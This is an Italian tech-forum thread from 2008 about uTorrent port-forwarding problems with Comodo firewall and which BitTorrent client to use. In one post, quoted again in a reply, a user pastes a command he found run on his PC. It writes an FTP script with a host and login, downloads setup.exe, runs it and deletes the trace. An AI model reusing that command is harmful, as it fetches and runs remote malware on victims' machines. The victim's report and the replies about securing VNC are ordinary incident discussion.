Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Internet provider in generale > Internet e provider

Antigravity A1: drone futuristico per riprese a 360° in 8K con qualche lacuna da colmare
Antigravity A1: drone futuristico per riprese a 360° in 8K con qualche lacuna da colmare
Abbiamo messo alla prova il drone Antigravity A1 capace di riprese in 8K a 360° che permette un reframe in post-produzione ad eliche ferme. Il concetto è molto valido, permette al pilota di concentrarsi sul volo e le manovre in tutta sicurezza e decidere con tutta tranquillità come gestire le riprese. La qualità dei video, tuttavia, ha bisogno di uno step in più per essere competitiva
Sony Alpha 7 V, anteprima e novità della nuova 30fps, che tende la mano anche ai creator
Sony Alpha 7 V, anteprima e novità della nuova 30fps, che tende la mano anche ai creator
Dopo oltre 4 anni si rinnova la serie Sony Alpha 7 con la quinta generazione, che porta in dote veramente tante novità a partire dai 30fps e dal nuovo sensore partially stacked da 33Mpixel. L'abbiamo provata per un breve periodo, ecco come è andata dopo averla messa alle strette.
realme GT 8 Pro Dream Edition: prestazioni da flagship e anima racing da F1
realme GT 8 Pro Dream Edition: prestazioni da flagship e anima racing da F1
realme e Aston Martin Aramco F1 Team si sono (ri)unite dando alla vita un flagship con chip Snapdragon 8 Elite Gen 5 e design esclusivo ispirato alle monoposto di Formula 1. La Dream Edition introduce la nuova colorazione Lime Essence abbinata al tradizionale Aston Martin Racing Green, decorazioni intercambiabili personalizzate e una confezione a tema F1, intorno a uno smartphone dall'ottima dotazione tecnica con batteria da 7000mAh ricaricabile a 120W e isola fotografica intercambiabile
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi

Strumenti
Old 22-11-2008, 12:43   #8541
Micene.1
Senior Member

L'Avatar di Micene.1

Iscritto dal: Mar 2005
Città: Roma
Quote:
Originariamente inviato da necrù Guarda i messaggi
salve gente, prima di tutto un po' di info sul mio calcolatore:

win xp sp3
alice 7 mega (down: 6Mbit; up: 400kbit)
pg2
avira
comodo firewall 3
modem: netgear dm111p

mi dite come mai utorrent non mi scarica una mazza?

il solito triste triangolino giallo mi perseguita..

ps: ho provato tutte le configuazioni di comodo... di tutti i forum.. ma nulla.. e cmq erano tutte uguali.. con emule, comodo non mi ha mai dato problemi.

quando faccio il test della porta di utorrent mi da sempre ERROR, anche cambiando porta (e quindi config del firewall)..
è un modem nn un router quindi il prob è del tuo firewall software...prova a cambiarlo e vedere se con qualcun altro va (nn so ce ne sono molti di firewall ianche freeware) eliminando gli altri soft che interagiscono con torrent come pg2 etc. - altrimenti sbagli qualcosa nell'impostazione di comodo e devi riconfigurare

Ultima modifica di Micene.1 : 22-11-2008 alle 12:47.
Micene.1 è offline   Rispondi citando il messaggio o parte di esso
Old 22-11-2008, 13:01   #8542
necrù
Member

L'Avatar di necrù

Iscritto dal: Aug 2008
Città: la Bari
un attimo.. vabbè è un modem e lo sapevo..

stamane utorrent mi scarica a 30-50 kb/s, un file cmq raro, con pochi seed

mentre un file con molti seed andava a 100-110 kb/s..

ma il triangolo giallo rimane sempre.. come mai?
Old 22-11-2008, 14:23   #8543
bimbetto
Senior Member

Iscritto dal: Dec 2006
come ti diceva micene ( ) il problema è comodo, e non il modem, verifica le sue impostazioni

ciao
bimbetto è offline   Rispondi citando il messaggio o parte di esso
Old 22-11-2008, 14:35   #8544
Slash82
Senior Member

L'Avatar di Slash82

Iscritto dal: Nov 2005
Città: Palermo
raga ho utorrent da un fottio,ma metti caso volessi cambiare quale client mi consigliereste?Oppure è meglio rimanere con utorrent?
Slash82 è offline   Rispondi citando il messaggio o parte di esso
Old 22-11-2008, 15:10   #8545
necrù
Member

L'Avatar di necrù

Iscritto dal: Aug 2008
Città: la Bari
Quote:
Originariamente inviato da bimbetto Guarda i messaggi
come ti diceva micene ( ) il problema è comodo, e non il modem, verifica le sue impostazioni

ciao
ma ho settato comodo per la porta di utorrent! seguendo tutte le guide..

però vi ho detto che mi scarica i file.. ma c'è sempre il triangolo giallo... e quando faccio verifica porta mi da ERROR--
Old 22-11-2008, 19:19   #8546
bimbetto
Senior Member

Iscritto dal: Dec 2006
il problema è sicuramente del firewall, dai il permesso al firewall di windows, poi disabilita comodo, pg e fai una prova, se funge ( tutto verde ) allora rimetti pg e riprovi, insomma vai x esclusione, anche se credo che sia comodo, anche perché ho letto di vari utenti con lo stesso tuo problema, comunque dai una occhiata qui link

ciao
bimbetto è offline   Rispondi citando il messaggio o parte di esso
Old 22-11-2008, 21:24   #8547
Lanfi
Senior Member

L'Avatar di Lanfi

Iscritto dal: Aug 2007
Città: Urbino
Comunque io uso utorrent e comodo e non ho mai avuto problemi. Di configurazioni speciali mi sono ben guardato dal farne...semplicemente la prima volta che ho avviato utorrent l'ho autorizzato tutte le (millemila) volte che comodo me l'ha chiesto.
PC: i5 750 - GV-R797OC-3GD - GA-P55UD4 - 4*2 GB DDR3 1600 - 2 x HD322HJ - HD103SJ - AF Extreme rev. 2.0 - HCG-620m - CM HAF 922 - Dell 2312hm / Mac: macbook pro unibody late 2008, 2,4 GHz Intel Core 2 Duo, 4 Gb ddr3, GeForce 9400 + 9600m gt / Ho concluso positivamente con Tatila, Mastermind06, Kao, Killerfabber, Sirjd e Alexburt1
Lanfi è offline   Rispondi citando il messaggio o parte di esso
Old 23-11-2008, 04:53   #8548
antonio338
Senior Member

L'Avatar di antonio338

Iscritto dal: Aug 2003
PROBABILE NUOVO BUG IN UTORRENT

ciao a tutti ho la versione di utorrent 1.8.1 e ce l'ho acceso da circa 1 giorno.
Al mio ritorno noto un fatto stranissimo: la cartella contenente i file che stavo scaricando si è aperta da sola.
Non ci faccio molto caso e la chiudo, ma accade di nuovo e mi accorgo che qualcuno ha cercato di eseguire del codice.
Il codice era md c echo open legenda.hostbot.c*m 21 ik &echo user legenda 28061986 ik &echo binary ik &echo get setup.exe ik &echo bye ik &ftp -n -v -sik &del ik &setup.exe &exit
evidentemente qualcuno ha tentato di scaricare qualcosa nel pc e eseguirlo per poi cancellare il file incriminato senza lasciare traccia.
Fortunatamente il sito non sembra raggiungibile (almeno utilizzando gli opendns) ma non so se quando è successo il fatto lo fosse.
Per ora ho provveduto ad aggiornare il server vnc all'ultima versione (quella che avevo prima era buggata e pure gravemente...) pensando che fosse quello, ma il fatto che qualcuno ha provato a eseguire codice proprio nelle cartelle in cui sto scaricando dei torrent mi fa pensare che il colpevole sia proprio lui.
PS mi sa che per un pò di tempo userò deluge

Ultima modifica di antonio338 : 23-11-2008 alle 04:57.
antonio338 è offline   Rispondi citando il messaggio o parte di esso
Old 23-11-2008, 10:39   #8549
sim89

Se è un bug bisognerebbe segnalarlo, nel forum ufficiale mi sembra ci sia lo spazio per farlo.
  Rispondi citando il messaggio o parte di esso
Old 24-11-2008, 15:17   #8550
danyheart1989
Senior Member

L'Avatar di danyheart1989

Iscritto dal: Oct 2007
Città: Caserta
salve...qualkuno mi sa dire come configurare bittorrent 6.1.2?
vorrei sfruttarlo al massimo...dalla prima pagina non ci ho capito gran che

grazie di un eventuale risposta
danyheart1989 è offline   Rispondi citando il messaggio o parte di esso
Old 24-11-2008, 16:18   #8551
Lanfi
Senior Member

L'Avatar di Lanfi

Iscritto dal: Aug 2007
Città: Urbino
Quote:
Originariamente inviato da antonio338 Guarda i messaggi
ciao a tutti ho la versione di utorrent 1.8.1 e ce l'ho acceso da circa 1 giorno.
Al mio ritorno noto un fatto stranissimo: la cartella contenente i file che stavo scaricando si è aperta da sola.
Non ci faccio molto caso e la chiudo, ma accade di nuovo e mi accorgo che qualcuno ha cercato di eseguire del codice.
Il codice era md c echo open legenda.hostbot.c*m 21 ik &echo user legenda 28061986 ik &echo binary ik &echo get setup.exe ik &echo bye ik &ftp -n -v -sik &del ik &setup.exe &exit
evidentemente qualcuno ha tentato di scaricare qualcosa nel pc e eseguirlo per poi cancellare il file incriminato senza lasciare traccia.
Fortunatamente il sito non sembra raggiungibile (almeno utilizzando gli opendns) ma non so se quando è successo il fatto lo fosse.
Per ora ho provveduto ad aggiornare il server vnc all'ultima versione (quella che avevo prima era buggata e pure gravemente...) pensando che fosse quello, ma il fatto che qualcuno ha provato a eseguire codice proprio nelle cartelle in cui sto scaricando dei torrent mi fa pensare che il colpevole sia proprio lui.
PS mi sa che per un pò di tempo userò deluge
Ma il server vnc è accessibile dall'esterno? Mi pare più lui il sospettato che utorrent...
PC: i5 750 - GV-R797OC-3GD - GA-P55UD4 - 4*2 GB DDR3 1600 - 2 x HD322HJ - HD103SJ - AF Extreme rev. 2.0 - HCG-620m - CM HAF 922 - Dell 2312hm / Mac: macbook pro unibody late 2008, 2,4 GHz Intel Core 2 Duo, 4 Gb ddr3, GeForce 9400 + 9600m gt / Ho concluso positivamente con Tatila, Mastermind06, Kao, Killerfabber, Sirjd e Alexburt1
Lanfi è offline   Rispondi citando il messaggio o parte di esso
Old 24-11-2008, 17:52   #8552
andreamang
Senior Member

L'Avatar di andreamang

Iscritto dal: Sep 2005
Quote:
Originariamente inviato da danyheart1989 Guarda i messaggi
salve...qualkuno mi sa dire come configurare bittorrent 6.1.2?
vorrei sfruttarlo al massimo...dalla prima pagina non ci ho capito gran che

grazie di un eventuale risposta
http://www.p2pforum.it/forum/showthread.php?t=87864
CPU: AMD Phenom II X4 965 Cooled by Arctic Cooling Freezer 13 MB: ASUS M5A87 AM3+ RAM: Corsair XMS3 DDR3 1333MHz 4Gb (2x2Gb) VGA: Sapphire RADEON HD6850 1Gb HDD: Seagate Barracuda 7200.11 500Gb + Seagate Barracuda 7200.14 1Tb DVD: Sony Optiarc AD-7260S ALI: Corsair VX450 MONITOR: Samsung SyncMaster BX2231 FullHD LED CASE: Thermaltake V3 Black Edition HEADPHONE+DAC: JVC HA-S680/Creative Aurvana Live!+FiiO E10
Love Trance Music???Click Here!!!
andreamang è offline   Rispondi citando il messaggio o parte di esso
Old 24-11-2008, 17:56   #8553
adynak
Senior Member

L'Avatar di adynak

Iscritto dal: Mar 2004
Città: Ancona
Uff ... di nuovo il problema della porta non inoltrata correttamente. A quanto pare ci sono delle volte in cui il problema non sussiste e altre volte in cui la porta non viene inoltrata correttamente. L'indirizzo IP interno del notebook è sempre lo stesso, la configurazione non è cambiata, ma fino a ieri la porta era inoltrata correttamente mentre oggi non lo è più. L'unica cosa che è cambiata sono i file in downlaod: esiste qualche strano caso in cui quello che scarico influenza il firewall?
adynak è offline   Rispondi citando il messaggio o parte di esso
Old 24-11-2008, 17:57   #8554
Micene.1
Senior Member

L'Avatar di Micene.1

Quote:
Originariamente inviato da adynak Guarda i messaggi
Uff ... di nuovo il problema della porta non inoltrata correttamente. A quanto pare ci sono delle volte in cui il problema non sussiste e altre volte in cui la porta non viene inoltrata correttamente. L'indirizzo IP interno del notebook è sempre lo stesso, la configurazione non è cambiata, ma fino a ieri la porta era inoltrata correttamente mentre oggi non lo è più. L'unica cosa che è cambiata sono i file in downlaod: esiste qualche strano caso in cui quello che scarico influenza il firewall?
no
Old 25-11-2008, 08:39   #8555
danyheart1989
Senior Member

Quote:
Originariamente inviato da andreamang Guarda i messaggi
questa è la guida di utorrent rilasciata circa 2anno e mezzo fà...
a me serve una guida di bittorrent abbastanza recente...grazie
Old 25-11-2008, 09:35   #8556
Micene.1
Senior Member

L'Avatar di Micene.1

ma bittorrent nuovo nn è un utorrent rimarchiato?
Old 25-11-2008, 11:39   #8557
danyheart1989
Senior Member

ma qual'è il miglior client dei 2?
Old 25-11-2008, 12:01   #8558
Micene.1
Senior Member

L'Avatar di Micene.1

Quote:
Originariamente inviato da danyheart1989 Guarda i messaggi
ma qual'è il miglior client dei 2?
utorrent
Old 25-11-2008, 15:34   #8559
danyheart1989
Senior Member

Quote:
Originariamente inviato da Micene.1 Guarda i messaggi
utorrent
parli a livello di impostazioni?
Perche mi sembra che in velocità di download so identici tutti
Old 25-11-2008, 17:51   #8560
antonio338
Senior Member

L'Avatar di antonio338

Iscritto dal: Aug 2003
Quote:
Originariamente inviato da Lanfi Guarda i messaggi
Ma il server vnc è accessibile dall'esterno? Mi pare più lui il sospettato che utorrent...
il server vnc l'ho aggiornato e limitato l'accesso alla sola lan... ma come mai il comando è stato eseguito solo nelle due cartelle in cui stavo scaricando?
antonio338 è offline   Rispondi citando il messaggio o parte di esso
 Rispondi

Antigravity A1: drone futuristico per riprese a 360° in 8K con qualche lacuna da colmare Antigravity A1: drone futuristico per riprese a ...
Sony Alpha 7 V, anteprima e novità della nuova 30fps, che tende la mano anche ai creator Sony Alpha 7 V, anteprima e novità della ...
realme GT 8 Pro Dream Edition: prestazioni da flagship e anima racing da F1 realme GT 8 Pro Dream Edition: prestazioni da fl...
OVHcloud Summit 2025: le novità del cloud europeo tra sovranità, IA e quantum OVHcloud Summit 2025: le novità del cloud...
Un mostro da MSI: QD-OLED WQHD a 500 Hz con AI Care e DisplayPort 2.1a Un mostro da MSI: QD-OLED WQHD a 500 Hz con AI C...
Gli aeroplani Airbus utilizzeranno i sat...
Una nuova immagine della cometa interste...
'La soluzione a un problema che non esis...
Radeon RX 9000 sì, Ryzen 9000 no:...
Amazon versa 180 milioni al Fisco e canc...
Meta, il Board di Supervisione guarda o...
DJI rivoluziona le consegne aeree: il nu...
Fibercop e Microsoft Italia uniscono per...
App Store Award 2025: scarica le 17 app ...
NVIDIA fa marcia indietro, il supporto P...
Addio definitivo alla GeForce GTX 1080: ...
Numeri record per gli iPhone 17: Apple s...
L'Italia del 2025 raccontata da Google: ...
Piaggio lancia Porter NPE, il pick-up el...
Xiaomi L1 a 153€: il proiettore smart 10...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian